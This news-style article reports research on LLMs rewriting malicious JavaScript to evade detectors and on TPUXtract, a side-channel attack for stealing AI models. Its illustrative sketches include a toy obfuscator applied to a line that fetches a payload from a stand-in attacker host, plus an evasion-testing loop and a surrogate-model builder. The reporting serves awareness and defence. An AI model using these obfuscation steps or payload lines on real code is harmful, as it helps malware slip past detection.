    AI Capable of Generating 10,000 Distinct Malware Variants, Evading Detection in 88% of Cases

    Cybersecurity experts have unearthed a disturbing capability within large language models (LLMs): the ability to mass-produce transformed iterations of malicious JavaScript code that deftly elude detection mechanisms.

    “While LLMs may falter at crafting malware from the ground up, cybercriminals are leveraging these systems to obfuscate and refine existing malicious scripts, making detection exponentially more difficult,” stated researchers at Palo Alto Networks’ Unit 42 in their latest report. “The linguistic transformations enabled by LLMs are markedly sophisticated, rendering the malicious code indistinguishable from legitimate scripts.”

    This iterative obfuscation technique, over time, has the insidious potential to degrade the efficacy of malware detection algorithms, coaxing them into misclassifying malicious scripts as harmless.

    Despite the bolstered safeguards implemented by LLM providers to deter misuse, malicious actors are employing tools like WormGPT to automate phishing campaigns tailored to specific victims and to develop unique strains of malware. In October 2024, OpenAI revealed it had thwarted over 20 covert operations that sought to exploit its platform for reconnaissance, vulnerability testing, script generation, and debugging assistance.

    Unit 42 demonstrated how LLMs can systematically rewrite existing malware samples, effectively sidestepping machine learning-based detection models such as Innocent Until Proven Guilty (IUPG) and PhishingJS. This methodology facilitated the creation of 10,000 distinct JavaScript variants while preserving their original malicious intent.
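
    Conceptually, this methodology can be pictured as a simple rewrite-and-check loop: feed a known-malicious script to the model, ask for a behavior-preserving rewrite, feed the result back in, and record how often the detector's verdict flips. The sketch below is a minimal illustration of that loop, assuming hypothetical rewrite_with_llm() and classify_js() helpers rather than any actual Unit 42 tooling.

        # Minimal sketch of an iterative rewrite-and-check loop.
        # rewrite_with_llm() and classify_js() are hypothetical stand-ins,
        # not real Unit 42 or vendor APIs.

        def rewrite_with_llm(js_source: str) -> str:
            """Ask an LLM for a behavior-preserving rewrite of the script (stub)."""
            raise NotImplementedError

        def classify_js(js_source: str) -> str:
            """Return 'malicious' or 'benign' from a detection model (stub)."""
            raise NotImplementedError

        def generate_variants(seed_script: str, rounds: int = 10_000) -> list:
            variants, current = [], seed_script
            for _ in range(rounds):
                current = rewrite_with_llm(current)  # each round rewrites the previous output
                variants.append(current)
            return variants

        def evasion_rate(variants: list) -> float:
            flipped = sum(1 for v in variants if classify_js(v) == "benign")
            return flipped / len(variants)  # Unit 42 reports roughly 0.88 for its own classifier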

    Obfuscation Techniques That Fuel Malware Proliferation

    The adversarial rewriting process employs several sophisticated methods, including:

    • Renaming variables to obscure their original purpose.
    • Splitting strings to hinder recognition.
    • Injecting superfluous “junk” code to camouflage malicious segments.
    • Eliminating redundant whitespace for added stealth.
    • Reconstructing code entirely to simulate authenticity.

    These transformations yield variants that maintain the original functionality but significantly diminish their detectability. According to Unit 42, these rewrites altered the verdict of their own malware classifier from “malicious” to “benign” in an alarming 88% of instances.
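
    To make these transformations concrete, the toy sketch below applies two of the simpler ones, variable renaming and string splitting, to a small JavaScript snippet held as a Python string. It is a rough, hand-rolled illustration of the general idea, not the LLM-driven rewriting Unit 42 studied.

        import re

        # A toy JavaScript snippet, manipulated purely as text for illustration.
        JS = 'var payloadUrl = "http://evil.example/payload.js"; fetch(payloadUrl);'

        def rename_variables(src, mapping):
            # Replace meaningful identifiers with opaque names to obscure intent.
            for old, new in mapping.items():
                src = re.sub(rf"\b{re.escape(old)}\b", new, src)
            return src

        def split_strings(src, chunk=6):
            # Break each string literal into concatenated chunks to hinder signature matching.
            def splitter(match):
                body = match.group(1)
                parts = [body[i:i + chunk] for i in range(0, len(body), chunk)]
                return " + ".join(f'"{p}"' for p in parts)
            return re.sub(r'"([^"]*)"', splitter, src)

        obfuscated = split_strings(rename_variables(JS, {"payloadUrl": "a1"}))
        print(obfuscated)
        # var a1 = "http:/" + "/evil." + "exampl" + "e/payl" + "oad.js"; fetch(a1);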

    Even more troubling, these reformulated JavaScript artifacts successfully evaded scrutiny by other malware detection platforms, including VirusTotal.

    Natural-Looking Code as a Cloaking Mechanism

    A unique advantage of LLM-enabled obfuscation is the “naturalness” of the resulting code. Unlike libraries such as obfuscator.io, which often produce detectable and formulaic patterns, LLM-generated rewrites mimic genuine coding styles, making them harder to flag or fingerprint.
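
    One way to see why formulaic obfuscation is easier to flag: tools such as obfuscator.io typically emit machine-generated identifiers like _0x4f2a, which even a crude heuristic can fingerprint, whereas an LLM rewrite that uses plausible, human-looking names leaves no such telltale. The check below is a simplified, hypothetical heuristic offered for illustration, not a detection rule from the report.

        import re

        # Hex-style identifiers (e.g. _0x4f2a) are a common telltale of automated obfuscators.
        OBFUSCATOR_ID = re.compile(r"\b_0x[0-9a-f]{4,}\b", re.IGNORECASE)

        def looks_machine_obfuscated(js_source, threshold=3):
            """Crude heuristic: flag code containing several hex-style identifiers."""
            return len(OBFUSCATOR_ID.findall(js_source)) >= threshold

        print(looks_machine_obfuscated('var _0x1a2b = ["x"]; _0x1a2b[0]; _0x3c4d();'))  # True
        print(looks_machine_obfuscated('const cfg = loadConfig(); applyTheme(cfg);'))   # False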

    “The scalability of generating new malicious code variants increases dramatically with generative AI,” the researchers noted. “However, these same tactics can also be harnessed to generate robust datasets for training detection systems to better counteract such threats.”
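
    The defensive flip side the researchers point to amounts to a standard data-augmentation loop: label the LLM-generated rewrites as malicious, fold them into the training set, and retrain the detector. The sketch below assumes a hypothetical extract_features() helper and uses scikit-learn only as an illustrative stand-in for whatever classifier a vendor actually runs.

        from sklearn.ensemble import RandomForestClassifier

        def extract_features(js_source):
            """Hypothetical feature extractor (token counts, string entropy, etc.)."""
            raise NotImplementedError

        def retrain_with_variants(benign, malicious, llm_variants):
            # Treat every LLM-generated rewrite as an additional labeled malicious sample.
            samples = benign + malicious + llm_variants
            labels = [0] * len(benign) + [1] * (len(malicious) + len(llm_variants))
            features = [extract_features(s) for s in samples]
            model = RandomForestClassifier(n_estimators=200)
            model.fit(features, labels)  # retrain on the augmented dataset
            return model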

    Emerging Threats: Model Theft via TPUXtract

    In parallel, academics from North Carolina State University have unveiled TPUXtract, a side-channel attack capable of conducting model-theft operations against Google’s Tensor Processing Units (TPUs) with a staggering 99.91% accuracy. This technique poses significant risks, including intellectual property exfiltration and follow-on cyberattacks.

    By capturing electromagnetic emissions during neural network computations, TPUXtract gleans sensitive hyperparameters such as:

    • Layer types and configurations.
    • Number of nodes and filters.
    • Kernel dimensions and activation functions.

    This sophisticated black-box approach enables adversaries to reconstruct a functional replica—or close approximation—of the target AI model. However, executing such an attack necessitates physical proximity to the TPU device and access to costly hardware to analyze the signals.
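
    To illustrate what reconstructing a surrogate looks like once the per-layer hyperparameters are known, the sketch below assembles a network from a list of recovered layer descriptions (type, filter count, kernel size, activation). The layer values are invented for illustration, not figures from the TPUXtract paper, and PyTorch is used only as a convenient stand-in.

        import torch.nn as nn

        # Hypothetical per-layer hyperparameters "recovered" from side-channel traces;
        # the values here are illustrative only.
        recovered_layers = [
            {"type": "conv",  "in": 3,  "out": 32, "kernel": 3, "activation": "relu"},
            {"type": "conv",  "in": 32, "out": 64, "kernel": 3, "activation": "relu"},
            {"type": "dense", "in": 64 * 28 * 28, "out": 10, "activation": None},
        ]

        def build_surrogate(layers):
            modules = []
            for spec in layers:
                if spec["type"] == "conv":
                    modules.append(nn.Conv2d(spec["in"], spec["out"], spec["kernel"], padding=1))
                elif spec["type"] == "dense":
                    modules.append(nn.Flatten())
                    modules.append(nn.Linear(spec["in"], spec["out"]))
                if spec["activation"] == "relu":
                    modules.append(nn.ReLU())
            return nn.Sequential(*modules)

        surrogate = build_surrogate(recovered_layers)  # approximate copy of the target architecture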

    “We successfully extracted the architectural blueprints and recreated high-level features of the AI,” stated Aydin Aysu, one of the study’s authors. “Using this intelligence, we reproduced an operational surrogate model that closely mirrors the original.”

    Implications for the Future

    As LLMs and advanced computational systems continue to evolve, their dual-use capabilities pose profound challenges to cybersecurity frameworks. While these tools unlock transformative potential in legitimate domains, they simultaneously empower malicious actors to innovate new vectors of attack, necessitating a commensurate evolution in defensive technologies.
